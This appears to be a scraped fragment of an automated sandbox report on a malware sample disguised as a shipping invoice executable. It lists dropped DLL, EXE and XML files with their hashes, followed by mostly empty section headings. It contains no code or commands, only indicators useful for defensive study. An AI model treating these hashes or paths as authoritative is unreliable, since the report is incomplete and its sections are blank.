C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	743B7D073C1BFB883B9F97CA1D5DDF94	01AFEC884E6B5D1CA5ECCB47E18C52CFF44882FA	1A0E9EC2FD53F7D0CE83BF4745D44681412724250046F0A88C54A630EE5A9A59
C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	CC869C04E8771D08397DC86374FE5A5E	D7CD17B9607538DCDD6FC267EE504B37740992FF	420007C3E0A76AC880679F323653D3B9321832F578CA4DC1C2A1E5775A0F77DD
C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe	PE32 executable (GUI) Intel 80386, for MS Windows	2483FFB732EFA8A92F6A78B4E97C07EA	4929D6076B400EB8C92D941E7C2898FEF282094D	8713626CFB6493E4905448C96BEA3F77C0A05876208B3F87BF95D13166D53A70
C:\Users\user\AppData\Roaming\pkgs\x-lz4.xml	XML 1.0 document, UTF-8 Unicode text	D36051864C2DB5D4112463629F26A091	24BF1CC82EBBCCFEE903A0F11E45D40D8F93BF0E	E0B10A6875F8FAB58C1E9C58900CB5363DD7ABFC5921C9FBC67D5A12212E7B5F

Analysis Report Shipping INVOICE-BL Shipment..exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs